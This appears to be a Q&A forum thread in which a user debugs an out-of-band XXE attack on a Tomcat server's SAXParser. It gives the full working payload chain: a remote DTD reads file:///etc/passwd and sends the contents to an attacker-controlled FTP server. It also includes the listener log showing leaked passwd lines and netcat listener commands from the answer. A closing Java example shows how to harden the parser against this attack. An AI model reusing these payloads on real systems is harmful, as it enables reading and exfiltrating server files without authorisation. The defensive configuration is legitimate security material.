
I'm trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I'm hosting two DTDs on GitHub Gist. These are their contents:

Base XML (What gets sent to the server):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data SYSTEM "https://gist.githubusercontent.com/.../a.dtd">
<a>
<b>&send;</b>
</a>

a.dtd (first DTD payload):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/.../b.dtd">
%dtd;

b.dtd (final DTD payload):

<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://[my server ip]:2121/%file;'>">
%all;

The reason I am trying to extract /etc/passwd is because I am trying to target a binary file, but when that didn't work, I thought I'd start with something simple. I have confirmed that I have access to /etc/passwd (just retrieved it as an entity originally).

The FTP server works fine and I made sure the port was open. This is the output when the above is executed.

[WEB] Starting webserver on 0.0.0.0:8888...
[FTP] Starting FTP server on 0.0.0.0:2121...
[FTP] x has connected
[FTP] Received:
USER anonymous
[FTP] Received:
PASS Java1.8.0_131@
[FTP] > 230 more data please!
[FTP] Received:
TYPE I
[FTP] > 230 more data please!
[FTP] Received:
CWD root:x:0:0:root:
[FTP] > 230 more data please!
[FTP] Received:
CWD root:
[FTP] > 230 more data please!
[FTP] Received:
CWD bin
[FTP] > 230 more data please!
[FTP] Received:
QUIT
[FTP] > 230 more data please!
[FTP] Received:

... (a lot more blank like above)
[FTP] > 230 more data please!
[FTP] Received:

[FTP] > 230 more data please!
[FTP] Client error: [Errno 32] Broken pipe
[FTP] Connection closed with x

An issue I found while answering Luc's question is an interesting one. Basically, if the data has any slashes, the FTP client interprets it as a folder? Unsure why it stops though. Perhaps I have to write a proper response mechanism so when a CWD command comes through I give it OK or another related response.

Rob Gates

1 Answer


I'm not sure what exactly is going on, but it looks like the client (your target) is sending the file's contents to the server as if it contains FTP commands. What if you just listen with netcat? Either just listen with nc -lp 2121 (or whatever your netcat variant wants for arguments, iirc some want nc -l 2121), or maybe the client expects a response in which case you could do something like this:

echo -ne '220 Ok\r\n' | nc -lp 2121

Note that FTP is a text-based protocol. Binary files will be troublesome if the client thinks it has to convert them into ASCII for the control connection. Do try, but it might be that that's your next obstacle.

Luc
  • Will be difficult because first I need to reply asking for password, then need to spam "need more data" for everything sent. Might be able to just type it back to the target. Will try later, but I don't understand why a non-binary file doesn't work. /etc/passwd is just text. – Rob Gates Nov 08 '18 at 15:56
  • @RobGates Perhaps `nc -lp 2121 | tee output` can show you both the output live, so that you can type back, as well as save it into a file? After it uploaded the binary, you can then strip off the FTP commands from the beginning of the file. – Luc Nov 08 '18 at 16:02
  • While testing I figured out an issue (why CWD). Basically, /etc/passwd has slashes in it (such as "/root:/bin/bash") and this is coming out to be "ftp://server:2121/root:x:0:0:root:/root:/bin/bash", which is why it is trying to do CWD root and CWD bin. Not sure how to prevent this. – Rob Gates Nov 08 '18 at 16:33
  • Even when I reply to the CWD commands with 250 (tried 200 too) Okay, the server quits and outputs the error "java.io.IOException: sun.net.ftp.FtpProtocolException: Illegal FTP command". – Rob Gates Nov 08 '18 at 16:42
  • @RobGates Ah, too bad. I'm sorry, I don't know enough about this specific server to help you effectively without going back and forth 20 times. I'd say, ask a friend to help and have a look, but I remember a few years ago I was studying software development and the only person in school, as well as among friends and family, who was into the security side of things. I didn't have someone to ask when I couldn't figure something out. Just in case you're in a similar situation, feel free to reach out -- contact info is in my profile (though note that I don't read Twitter regularly). – Luc Nov 08 '18 at 18:54
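The whole chain in the question (remote DTD via DOCTYPE, `file:///etc/passwd` read through a parameter entity, contents pushed out in an `ftp://` URL) only works because the server-side SAXParser is allowed to resolve external DTDs and entities. The following is an added example, not code from the question, the answer or Tomcat, showing the parser configuration that refuses that document before any entity is fetched; the class name, the `tryParse` helper and the placeholder Gist URL are assumptions for the demo.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxDemo {

    // Build a SAXParser that cannot be driven to fetch a remote DTD or read
    // local files. The feature URIs are the Xerces ones understood by the
    // JDK's bundled parser, which is what Tomcat's default factory returns.
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        // Reject any <!DOCTYPE ...>: no DOCTYPE means no external subset and
        // no parameter entities, so the a.dtd -> b.dtd chain never starts.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments that must keep DOCTYPE allowed:
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return f.newSAXParser();
    }

    // Returns "parsed" when the hardened parser accepts the document and
    // "rejected: <reason>" when it refuses it. An empty handler suffices here
    // because the point is whether parsing is allowed to proceed at all.
    static String tryParse(String xml) throws Exception {
        try {
            hardenedParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return "parsed";
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // The document from the question; the Gist URL is left as a placeholder.
        String xxe = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE data SYSTEM \"https://gist.githubusercontent.com/.../a.dtd\">\n"
                + "<a><b>&send;</b></a>";
        // A document with no DOCTYPE, which the same parser still accepts.
        String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><a><b>hello</b></a>";
        System.out.println(tryParse(xxe));
        System.out.println(tryParse(benign));
    }
}
```

Because the DOCTYPE is refused while it is being read, the network request to the Gist host never happens, which is also what you would look for on the defensive side: an application server making outbound HTTP or FTP connections during XML parsing is the observable symptom of this class of bug.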